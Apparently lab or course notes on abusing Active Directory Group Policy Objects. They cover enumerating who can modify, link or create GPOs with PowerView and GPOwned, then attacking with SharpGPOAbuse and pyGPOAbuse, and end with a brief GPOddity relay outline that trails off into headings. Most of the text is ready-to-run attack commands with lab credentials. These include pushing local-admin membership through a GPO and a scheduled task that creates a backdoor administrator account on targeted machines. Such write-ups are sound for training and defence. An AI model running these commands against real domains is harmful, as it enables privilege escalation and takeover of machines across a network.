GPO Abuse

DACL Attacks

There are two main attack paths related to Group Policy Objects (GPOs).

• The first involves permissions to modify a GPO. If a user can edit a GPO, they can change its configuration and cause commands or scripts to execute on every computer where that policy is applied.

• The second involves permissions to link a GPO to an Active Directory (AD) object such as an Organisation Unit (OU), domain, or site. On its own, this permission is not always sufficient for abuse. However, when combined with the ability to create or modify GPOs, it allows an attacker to attach a malicious policy to systems in the environment.

When enumerating GPOs from a security perspective, four main characteristics should be analyzed:

• Non-administrative users who can modify GPOs – these represent potential targets for abuse.

• Where those GPOs are linked – these indicate the potential impact of modifying the policy.

• Non-administrative users who can link GPOs – these provide possible attack avenues.

• Users who can create new GPOs – these may allow an attacker to introduce a malicious policy into the domain.

Understanding these relationships helps determine whether a compromised account can influence systems through Group Policy.

GPO Enumeration - Windows

The first step is usually to enumerate existing GPOs in the domain. Using PowerView, we can retrieve information about domain policies.

# Enumerate the first domain GPO
Get-DomainGPO | Select-Object -First 1

# List all GPOs
Get-DomainGPO -Properties displayname

Several properties are particularly important when reviewing GPO objects.

Property	Description
displayname	The name displayed for the GPO in tools such as the Group Policy Management Console (GPMC). Administrators typically identify policies using this name.
name	The unique identifier of the GPO, usually a GUID. This value uniquely identifies the policy within AD.
gpcfilesyspath	The file system path containing the GPO files inside the SYSVOL share on domain controllers. These files hold the policy configuration and are replicated across the domain.
objectguid	A globally unique identifier used by AD and applications that interact programmatically with the GPO.

Identifying Where GPOs are Applied

GPO links are stored in the gPLink attribute of domain objects such as domains, sites, and OUs. This attribute references the GUID of the linked policy. In the following example, the GUID corresponds to the Default Domain Policy. The number at the end represents link options.

• 0 → enabled

• 1 → disabled

• 2 → enforced

• 3 → enforced but disabled

# List where GPOs are linked
Get-DomainObject -SearchScope Base -Properties gplink

gplink
------
[LDAP://cn={31B2F340-016D-11D2-945F-00C04FB984F9},cn=policies,cn=system,DC=marvel,DC=local;0]

Identifying Users with GPO Modification Rights

Another important task is identifying users who have permissions to modify GPOs. The following command searches for non-default users (SIDs greater than 1000) who possess potentially dangerous permissions.

# List non-default domain users with GPO-related permissions
> Get-DomainGPO | Select-Object -First 1 | Get-DomainObjectAcl -ResolveGUIDs |
where { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty|DeleteChild|DeleteTree|WriteDacl|WriteOwner" -and $_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$' }

...
ObjectDN       : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=marvel,DC=local
ActiveDirectoryRights : CreateChild, DeleteChild, ReadProperty, WriteProperty, GenericExecute
SecurityIdentifier  : S-1-5-21-831407601-1803900599-2479021482-1604

# Resolve SID
> ConvertFrom-SID S-1-5-21-831407601-1803900599-2479021482-1604
MARVEL\Server Admins

# List group members
> Get-DomainGroupMember "Server Admins" | select MemberName

MemberName
----------
maria

The same approach can be used to identify GPO links at different levels of the AD hierarchy.

# Sites
Get-DomainSite -Properties gplink

# OUs
Get-DomainOU | Select name, gplink

To determine which systems might be affected by a linked GPO, the computers within the targeted OUs can be listed.

# List computers within the target OUs
Get-DomainOU | foreach { $ou = $_.distinguishedname; Get-DomainComputer -SearchBase $ou -Properties dnshostname | select @{Name='OU';Expression={$ou}}, @{Name='FQDN';Expression={$_.dnshostname}} }

Identifying Users with GPO Creation Rights

Another important privilege is the ability to create new GPOs. This permission can also be enumerated by analyzing the ACLs of the container where GPO objects are stored.

# Users with the ability to create GPOs
$identity = (Get-DomainGPO).distinguishedname -replace 'CN=\{[A-F0-9-]+\},',''
Get-DomainObjectACL -Identity $identity -ResolveGUIDs |
where { $_.ActiveDirectoryRights -contains "CreateChild" -and $_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$' } |
foreach { ConvertFrom-SID $_.SecurityIdentifier }

If the necessary administrative tools are available, new GPOs can be created using the GroupPolicy module included with Remote Server Administration Tools (RSAT) or PowerGPOAbuse.

# Check if the GroupPolicy module is installed
Get-Command -Module GroupPolicy

# Create a new GPO
New-GPO -Name TestGPO -Comment "This is a test GPO."

Identifying Users with GPO Link Rights

Users with the ability to link GPOs can modify the gPLink attribute on sites, domains, or OUs. The following commands enumerate those permissions.

# Site-level linking rights
Get-DomainSite -Properties distinguishedname | foreach { Get-DomainObjectAcl -SearchBase $_.distinguishedname -ResolveGUIDs | where { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN, @{Name='ResolvedSID';Expression={ConvertFrom-SID $_.SecurityIdentifier}} | Format-List }

# Domain-level linking rights
Get-DomainObjectAcl -SearchScope Base -ResolveGUIDs | where { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN, @{Name='ResolvedSID';Expression={ConvertFrom-SID $_.SecurityIdentifier}} | Format-List

# OU-level linking rights
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | where { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN, @{Name='ResolvedSID';Expression={ConvertFrom-SID $_.SecurityIdentifier}} | Format-List

A GPO can then be linked using the GroupPolicy module:

# Link a GPO
New-GPLink -Name TestGPO -Target "OU=TestOU,DC=marvel,DC=local"

Automating GPO Enumeration

The Get-GPOEnumeration script (a wrapper around PowerView) automates the process of identifying potentially exploitable GPO permissions. When executed without parameters, it searches for:

• GPOs that non-administrative users can modify

• Where those GPOs are linked

Additional parameters include: -ModifyGPOs, -LinkGPOs, and -CreateGPO.

# GPO enumeration
> Get-GPOEnumeration
...
PrincipalName    : Server Admins
GPOName       : Default Domain Policy
GPCFileSysPath    : \\marvel.local\sysvol\marvel.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
AppliedScopes    : Domain: marvel
ActiveDirectoryRights : CreateChild, DeleteChild, ReadProperty, WriteProperty, GenericExecute

GPO Abuse - Windows

Once a user has the ability to edit a GPO, they can introduce malicious configurations that will be executed on affected systems. A common tool for this purpose is SharpGPOAbuse (Invoke-SharpGPOAbuse.ps1). Another option available in PowerView is the New-GPOImmediateTask command, which creates a scheduled task through the policy.

# Add a user to the local administrators group on systems affected by the policy
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount x7331 --GPOName "Default Security Policy - WKS"

# Invoke-SharpGPOAbuse.ps1
Invoke-SharpGPOAbuse -Command '--AddLocalAdmin --UserAccount x7331 --GPOName "Default Security Policy - WKS"'

It is important to note that using the --AddLocalAdmin option may overwrite existing administrator settings if the modified GPO has higher priority. If local administrator configurations already exist on the affected systems, they may be replaced.

GPO Enumeration - Linux

GPO enumeration can also be performed from Linux systems. Tools such as GPOwned and pywerview provide functionality similar to PowerView. The former's gpcmachine and gpcuser flags target GPOs related to computers and users respectively.

# List GPOs
python3 GPOwned.py -u x7331 -p Password123 -d marvel.local -dc-ip 172.16.92.10 -gpcmachine -listgpo

# Search for GPO links
python3 GPOwned.py -u x7331 -p Password123 -d marvel.local -dc-ip 172.16.92.10 -gpcmachine -listgplink

Site-level links are not included by default, so these may need to be queried directly from the Sites container in Active Directory. To identify users with GPO modification rights, GPOwned can be combined with dacledit.

# List all GPO GUIDs
python3 GPOwned.py -u x7331 -p Password123 -d marvel.local -dc-ip 172.16.92.10 -gpcmachine -listgpo | grep " Name:"

# Check permissions on a GPO
dacledit.py marvel.local/x7331:Password123 -target-dn "CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=marvel,DC=local" -dc-ip 172.16.92.10

GPO Abuse - Linux

To abuse a GPO from Linux, pyGPOAbuse can be used. This tool partially implements the functionality of SharpGPOAbuse and allows execution of commands through scheduled tasks or PowerShell.

# Create a backup of the GPO
python3 GPOwned.py -u x7331 -p Password123 -d marvel.local -dc-ip 172.16.92.10 \
-gpcmachine -backup backupgpo -name "{31B2F340-016D-11D2-945F-00C04FB984F9}"

# Modify the GPO to create a user and add it to local administrators
pygpoabuse.py marvel.local/x7331:Password123 -gpo-id EF1EBF2A-08F2-48E0-9D2E-67D9F2CE875D \
-command "net user plaintext Password1234 /add && net localgroup Administrators plaintext /add" -taskname "PT_LocalAdmin" -description "this is a GPO test" -dc-ip 172.16.92.10 -v

GPOddity

GPOddity combines NTLM relaying with the modification of a GPO:

1. The target user has WriteDACL over a GPO

2. Relay credentials of the target user for modifying the path of the GP template (gPCFileSysPath)

3. Load a malicious template from an attacker-controlled location

The GPOddity attack (image taken from the CRTP course).

Recon

The target user has WriteDACL over a GPO:

# Get GPO's details with PowerView
> Get-DomainGPO -identity "DevOps Policy"

displayname              : DevOps Policy
name                     : {0BF8D01C-1F62-4BDC-958C-57140B67D147}
cn                       : {0BF8D01C-1F62-4BDC-958C-57140B67D147}
objectguid               : fc0df125-5e26-4794-93c7-e60c6eecb75f
gpcfilesyspath           : \\dollarcorp.moneycorp.local\SysVol\dollarcorp.moneycorp.local\Policies\{0BF8D01C-1F62-4BDC-958C-57140B67D147}
distinguishedname        : CN={0BF8D01C-1F62-4BDC-958C-57140B67D147},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
objectcategory           : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

Relay

WriteDACL

GPOddity